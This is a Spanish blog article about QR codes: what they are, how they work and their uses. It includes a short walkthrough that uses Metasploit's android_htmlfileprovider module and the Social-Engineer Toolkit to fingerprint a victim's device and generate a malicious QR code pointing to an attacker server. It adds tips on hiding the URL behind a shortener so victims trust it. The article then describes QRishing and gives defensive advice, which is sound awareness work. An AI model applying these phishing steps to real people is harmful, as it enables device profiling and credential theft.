Código QR: qué es, cómo funciona, tipología y QRishing
¿Qué es un QR?
Por Fernando Manrique
Quick response (Código de respuesta rápida), es un módulo para guardar información en un código de barras con una matriz de datos. En la práctica los códigos QR contienen a menudo datos para un localizador o rastreador que apunta a un sitio web de aplicación.
El sistema de respuesta rápida se hizo popular en la industria automovilística debido a su rápida legibilidad y capacidad de almacenamiento en comparación con los códigos de barras UPC estándares.
Estos códigos están formados por una combinación de barras y cuadros que acompañan a un producto o unidad de consumo para que pueda ser leído y descifrado mediante un lector óptico que transmite los datos a una máquina o computadora.
Gracias a esto muchas empresas han sido capaces de no demostrar toda su cartera de productos y servicios de una forma más segura ¿Realmente MAS SEGURA?
Por Fernando Manrique
¿Cómo funciona un código QR?
Cuando escaneas un código QR, el lector QR en la cámara de tu teléfono descifra el código y la información resultante activa una acción en tu teléfono. Si el código QR tiene una URL, el teléfono mostrará esta.
Tipos de Códigos QR:
Estáticos, codifican el contenido dentro del propio código QR lo que significa que una vez configurado no se pueda cambiar.
Dinámicos, están vinculados a una URL corta que redirige el contenido elegido, haciéndolos reciclables, pudiendo cambiar o actualizar su contenido tantas veces como se desee.
Finalidad de un código QR:
Las funciones más habituales de un código QR son:
- Abrir una página web
- Tarjetas de presentación
- Promociones, charlas, conferencias
- Mostrar una localización
- Enviar un email
- Conectar a una red wifi
- Redirigir a un usuario a los perfiles en redes sociales
- Descargar un archivo
- Mostrar una imagen
- Descargar una aplicacion
Extracción de info del dispositivo víctima:
Generación de dirección url -> obtención de info del dispositivo víctima
- auxiliar a utilizar en metasploit: android_htmlfileprovider
- metasploit: search android_htmlfileprovider
Configuración módulo android_htmlfileprovider:
msf6 auxiliary(gather/android_htmlfileprovider) > [*] Request 'GET /' [*] User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1 [*] Sending initial HTML ... [*] Request 'GET /favicon.ico'
NOTA: Obtenemos el sistema operativo y el browser que este utiliza
Crear Código QR: codigo de respuesta rápida, se puede pasar prácticamente de todo por ellos
social enginerin toolkit root> setoolkit The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com It's easy to update using the PenTesters Framework! (PTF) Visit https://github.com/trustedsec/ptf to update all your tools! Select from the menu: 1) Social-Engineering Attacks 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1 - social-engineering attacks 8 - QRCode Generator Attack Vector Enter the URL you want the QRCode to go to (99 to exit): http://172.20.10.9/8081 [*] QRCode has been generated under /root/.set/reports/qrcode_attack.png Press <return> to continue
Ruta al código QR generado: /root/.set/reports/qrcode_attack.png
NOTA: El Código QR no levanta sospechas al enviarlo a la víctima dado que es un png y no se reconocerá como malicioso. Además debemos tener levantado el server a la hora de enviarlo para que este tenga efecto.
Uso de acortadores:https://bitly.com
Podemos usar acortadores de url como la web que indicamos arriba, esto hará que la URL generada y oculta tras el código QR sea más creíble para la víctima.
QRishing:
A la técnica de engaño a través de QR se se llama “QRishing” o lo que es lo mismo, “phishing” a través de códigos QR: al escanear el código el usuario es dirigido a un sitio web falso, donde piden las credenciales o información sensible para usar esos datos con propósitos maliciosos (cometer otros ataques, suplantar la identidad.
¿Cómo evitar ser engañados por QRishing?
Hay que tener instalado un antivirus o un antimalware en nuestro dispositivo. También es importante prestar atención a qué escaneamos, dónde y por qué. Y si vamos a escanear uno, configurar nuestro lector de QR para que no vaya directamente a la URL, sino que nos permita verla antes de acceder. Así podremos comprobar que se trata del sitio web al que queremos ir.
No es que haya que desconfiar de todos los códigos QR o que haya que dejar de usarlos, sino que hay que prestar atención a qué es lo que escaneamos. Según la policía, “uno de los casos en los que hay que tener especial cuidado es en aquellos en los que veamos que el código está pegado encima de otro cartel, porque es posible que debajo esté el de la marca y que ese haya sido superpuesto por ciberdelincuentes”.